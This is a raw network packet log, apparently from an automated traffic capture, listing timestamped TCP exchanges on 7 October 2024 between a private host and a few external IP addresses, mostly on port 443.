                                                          Oct 7, 2024 18:47:11.827600002 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:11.827605009 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.848009109 CEST49767443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:11.848026037 CEST4434976713.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.849008083 CEST49767443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:11.849014044 CEST4434976713.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.915703058 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.915891886 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:11.915927887 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.916629076 CEST4434976613.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.916799068 CEST4434976613.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.917134047 CEST49766443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:11.917179108 CEST49766443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:11.917202950 CEST4434976613.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.917236090 CEST49766443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:11.917242050 CEST4434976613.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.920452118 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:11.920458078 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.922005892 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:11.975902081 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.000020027 CEST4434976713.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.000185966 CEST4434976713.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.000488997 CEST49767443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.000488997 CEST49767443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.000709057 CEST49767443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.000746965 CEST4434976713.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.004635096 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.004806042 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.007210016 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.047395945 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.094096899 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.100791931 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.100822926 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.103024006 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.147407055 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.181057930 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.184885979 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.184904099 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.194185019 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.197115898 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.239396095 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.274498940 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.278151035 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.278172016 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.289936066 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.295716047 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.339421988 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.365247965 CEST4434977013.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.365340948 CEST49770443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.367187977 CEST49770443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.367196083 CEST4434977013.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.367543936 CEST4434977013.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.367615938 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.369020939 CEST49770443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.370912075 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.370923042 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.384578943 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.387259007 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.415400028 CEST4434977013.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.427398920 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.458795071 CEST4434976513.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.459368944 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.459717035 CEST4434976513.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.459801912 CEST49765443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.459903955 CEST49765443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.459954023 CEST4434976513.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.459999084 CEST49765443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.460016966 CEST4434976513.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.461662054 CEST4434977013.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.461740017 CEST4434977013.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.461801052 CEST49770443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.462178946 CEST49770443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.462196112 CEST4434977013.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.462204933 CEST49770443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.462210894 CEST4434977013.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.462969065 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.462977886 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.463819981 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.463830948 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.464329004 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.464338064 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.475672960 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.477509022 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.519424915 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.551740885 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.555311918 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.555366039 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.556385994 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.558676958 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.559092045 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.561002970 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.561017036 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.563879967 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.607415915 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.640151024 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.643923044 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.643968105 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.654072046 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.656575918 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.658056021 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.660422087 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.660434961 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.662648916 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.662699938 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.662733078 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.815790892 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.819322109 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.859401941 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.876893997 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.880275011 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.880306005 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.883234024 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.927406073 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.982714891 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.985939980 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.985996008 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:12.986037016 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:12.986078024 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.021126032 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.021214008 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.024260044 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.024499893 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.024519920 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.025296926 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.071402073 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.083663940 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.086179018 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.086232901 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.104245901 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.106652021 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.147419930 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.175638914 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.177736998 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.177783966 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.181015968 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.183830976 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.183849096 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.185684919 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.195365906 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.197597980 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.239420891 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.511069059 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.511991024 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.512058973 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.512073994 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.515317917 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.515331984 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.515678883 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.517885923 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.517906904 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.518518925 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.519018888 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.519036055 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.635052919 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.638286114 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.656999111 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.657151937 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.657210112 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.657228947 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.660007000 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.660022974 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.660461903 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.660540104 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.660556078 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.662483931 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.701400042 CEST4972380192.168.2.42.16.100.168
                                                          Oct 7, 2024 18:47:13.703399897 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.707156897 CEST80497232.16.100.168192.168.2.4
                                                          Oct 7, 2024 18:47:13.707269907 CEST4972380192.168.2.42.16.100.168
                                                          Oct 7, 2024 18:47:13.745275021 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.747883081 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.747908115 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.794127941 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.796168089 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.796190023 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.798135042 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.850871086 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.850895882 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.855469942 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.855560064 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.855573893 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.856462002 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.880896091 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.883337021 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.927424908 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.947926044 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.951816082 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.951843023 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.969535112 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.972353935 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.973632097 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.976577044 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:13.976609945 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:13.979207993 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.019397974 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.061671972 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.069843054 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.069891930 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.135035038 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.141423941 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.141443968 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.143731117 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.187423944 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.200448036 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.204273939 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.204288960 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.206533909 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.247415066 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.281161070 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.335201025 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.335222960 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.338890076 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.338946104 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.367877960 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.367921114 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.368004084 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.368026018 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.371284008 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.371334076 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.371361971 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.407485008 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.409490108 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.409856081 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.409868002 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.452676058 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.454962969 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.495403051 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.770638943 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.770798922 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.771691084 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.771708012 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.774661064 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.774671078 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.774719954 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.774724007 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.775568008 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.775572062 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.775614023 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.775616884 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.857628107 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.860311985 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.860326052 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.869189978 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.870934010 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.872242928 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.913373947 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.913394928 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.915524960 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.949561119 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.952199936 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.952409029 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:14.952450037 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.954833031 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:14.956600904 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.003417015 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.007414103 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.009319067 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.009335995 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.038815022 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.040635109 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.083420038 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.091619968 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.094414949 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.094443083 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.094690084 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.129709005 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.129793882 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.129807949 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.132124901 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.132225037 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.132256985 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.132491112 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.175401926 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.177786112 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.179755926 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.179773092 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.227349997 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.232341051 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.232357025 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.269139051 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.270400047 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.270574093 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.270581961 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.276957989 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.281600952 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.281640053 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.283307076 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.327402115 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.353583097 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.356439114 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.356470108 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.413470030 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.416342974 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.416372061 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.416733027 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.459445000 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.459510088 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.459532022 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.463293076 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.463392973 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.463409901 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.464076042 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.507405043 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.548959970 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.551625013 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.551660061 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.591551065 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.594202042 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.594225883 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.668662071 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.674937010 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.674972057 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.676691055 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.693042040 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.696460009 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.739420891 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.778361082 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.782306910 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.782330990 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.782648087 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.785203934 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.821609020 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.823919058 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.823928118 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.825917959 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.861043930 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.863291979 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.877695084 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.879676104 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.905503035 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.907598972 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.949318886 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.958120108 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.966227055 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:15.968518972 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:15.993726015 CEST4434976913.107.246.45192.168.2.4
